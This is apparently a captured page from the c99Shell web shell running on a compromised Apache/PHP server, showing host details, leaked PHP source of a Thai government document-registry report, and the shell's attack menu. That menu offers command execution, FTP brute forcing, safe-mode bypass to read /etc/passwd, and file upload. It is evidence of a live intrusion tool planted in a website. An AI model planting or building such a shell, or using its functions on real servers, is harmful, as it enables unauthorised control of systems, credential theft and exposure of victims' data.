!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     printRepHisRegisDocDept.php (28.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
รายงานทะเบียนหนังสือราชการของหน่วยงานแยกตามหน่วยงานย่อย

SearchRepReceiveDoc(); while($oDt->GetRecord()){ $dt1=$oDt->DtID."1"; if($typeshow==$dt1){ echo "รายงานทะเบียนรับ".$oDt->DtName; $DtID=$oDt->DtID; $RsID=1; } $dt2=$oDt->DtID."2"; if($typeshow==$dt2){ echo "รายงานทะเบียนส่ง".$oDt->DtName; $DtID=$oDt->DtID; $RsID=2; } } //-----In $oDt->RSdoctypeDtNoRunAll(); while($oDt->GetRecord()){ $dt3=$oDt->DtID."3"; if($typeshow==$dt3){ echo "รายงานทะเบียนรับ".$oDt->DtName; $DtID=$oDt->DtID; $RsID=3; } $dt4=$oDt->DtID."4"; if($typeshow==$dt4){ echo "รายงานทะเบียนส่ง".$oDt->DtName; $DtID=$oDt->DtID; $RsID=4; } } $dt1="1"."3"; if($typeshow==$dt1){ $oDt->SearchByKey(1); $oDt->GetRecord(); echo "รายงานทะเบียนรับ".$oDt->DtName; $DtID=1; $RsID=3; } $dt1="2"."3"; if($typeshow==$dt1){ $oDt->SearchByKey(2); $oDt->GetRecord(); echo "รายงานทะเบียนรับ".$oDt->DtName; $DtID=2; $RsID=3; } //-------for regis $oDt->SearchRepRegisDoc(); while($oDt->GetRecord()){ $dt5=$oDt->DtID."5"; if($typeshow==$dt5){ echo "รายงานทะเบียน".$oDt->DtName; $DtID=$oDt->DtID; $RsID=5; } } ?> SearchByKey($selectPositionDeptID); $oDP1->GetRecord(); echo " หน่วยงาน :: ".$oDP1->deptName; $DocGroup=$oDP1->docGroup; ?> OIS...
พิมพ์หน้านี้  พิมพ์ excel

"; $flag = 0; if(th2a($yearDoc) == 0){ list($dd, $mm, $yy) = split('[/]',$start); $startT=($yy+543)."-".$mm."-".$dd; list($dd, $mm, $yy) = split('[/]',$end); $endT=($yy+543)."-".$mm."-".$dd; $oDoc->SearchRsIDDtIDfDeleteDocNoSubject2DocGroup($RsID,$DtID,$startT,$endT,th2a($DocTypeNoStart),th2a($DocTypeNoEnd),th2a($DocSubject),$DocGroup,$selectPositionDeptID,$printorder); }else{ $yy = th2a($yearDoc); $startT = $yy."-01-01"; $endT = $yy."-12-31"; //echo $start."=".$end."=",$depId."=".$Type; $oDoc->SearchRsIDDtIDfDeleteDocNoSubject2DocGroup($RsID,$DtID,$startT,$endT,th2a($DocTypeNoStart),th2a($DocTypeNoEnd),th2a($DocSubject),$DocGroup,$selectPositionDeptID,$printorder); } while($oDoc->GetRecord()){ list($DocD,$DocT) = split(' ',$oDoc->DocDateCreate); $a=$DocD; if($d!=$DocD){ $d=$a; ?>
 
วันที่ลงทะเบียนหนังสือ   
"> "> "> "> "> "> "> "> DocPID=="0" || $oDoc->DocPID==""){ $searchDoc=$oDoc->DocID; }else{ $searchDoc=$oDoc->DocPID; } if($RsID==1 || $RsID==2){ ?> ">
เลข
ทะเบียน
ที่ ลงวันที่ จาก ถึง เรื่อง การปฏิบัติ หมายเหตุ
เลข
ทะเบียน
ที่ ลงวันที่ จาก ถึง เรื่อง การปฏิบัติ หมายเหตุ
เลข
ทะเบียน
ที่ ลงวันที่ จาก ถึง เรื่อง การปฏิบัติ หมายเหตุ
ที่ สั่ง ณ วันที่ เรื่อง ที่คำสั่งเดิมยกเลิก การปฏิบัติ หมายเหตุ
ฉบับที่ ณ วันที่ ว่าด้วย/เรื่อง การปฏิบัติ หมายเหตุ
ครั้งที่ ประกาศ ณ วันที่ เรื่อง การปฏิบัติ หมายเหตุ
ครั้งที่ วัน/เดือน/ปี เรื่อง การปฏิบัติ หมายเหตุ
ที่ วดป ที่ออกใบรับรอง บุคคลที่รับรอง เรื่อง ผู้รับเอกสาร การปฏิบัติ หมายเหตุ
DocTypeNo); ?> DocNo; ?> DocDate,'/');?> DocFrom; ?> DocTo; ?> DocSubject; ?> PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>DocShortDesc, 14, "\n", true); ?>
DocTypeNo); ?> DocNo; ?> DocDate,'/');?> SearchByKey($oDoc->DocPID); $oDoc2->GetRecord(); $oDlc2->SearchByKey($oDoc2->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP1->SearchByKey($oDlc2->deptId); $oDP1->GetRecord(); echo a2th($oDoc->DocFrom)."
"; echo "(".$oDP1->deptName."
"; echo $oDlp->DlpName.")"; }else if($RsID==4){ $oDlc2->SearchByKey($oDoc->DlcID); $oDlc2->GetRecord(); $oDP1->SearchByKey($oDlc2->deptId); $oDP1->GetRecord(); echo "(".$oDP1->deptName.")"; } ?>
DocTo; ?> DocSubject; ?> PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>DocShortDesc, 14, "\n", true); ?>
DocTypeNo); ?> DocNo; ?> DocDate,'/');?> SearchByKey($oDoc->DocPID); $oDoc2->GetRecord(); $oDlc2->SearchByKey($oDoc2->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP1->SearchByKey($oDlc2->deptId); $oDP1->GetRecord(); echo $oDP1->deptName."
"; echo "(".$oDlp->DlpName.")"; }else if($RsID==4){ $oDlc2->SearchByKey($oDoc->DlcID); $oDlc2->GetRecord(); $oDP1->SearchByKey($oDlc2->deptId); $oDP1->GetRecord(); echo $oDP1->deptName."
"; } ?>
DocTo; ?> DocSubject; ?> PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>DocShortDesc, 14, "\n", true); ?>
DocTypeNo); ?> DocNo; ?> DocDate,'/');?> SearchByKey($oDoc->DocPID); $oDoc2->GetRecord(); $oDlc2->SearchByKey($oDoc2->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP1->SearchByKey($oDlc2->deptId); $oDP1->GetRecord(); echo $oDP1->deptName."
"; echo "(".$oDlp->DlpName.")"; }else if($RsID==4){ $oDlc2->SearchByKey($oDoc->DlcID); $oDlc2->GetRecord(); $oDP1->SearchByKey($oDlc2->deptId); $oDP1->GetRecord(); echo $oDP1->deptName."
"; } ?>
DocTo; ?> DocSubject; ?> PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>DocShortDesc, 14, "\n", true); ?>
DocNo; ?> DocDate,'/');?> DocSubject; ?>   PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>
DocNo; ?> DocDate,'/');?> DocSubject; ?> PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>
DocNo; ?> DocDate,'/');?> DocSubject; ?> PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>
DocNo; ?> DocDate,'/');?> DocSubject; ?> PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>
DocNo; ?> DocDate,'/');?> CertificatePs; ?> DocSubject; ?>   PtID!=="1"){ searchDocSendToPs($oDoc->DocID); }?> DocShortDesc; ?>
" >** ไม่พบรายการ **


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--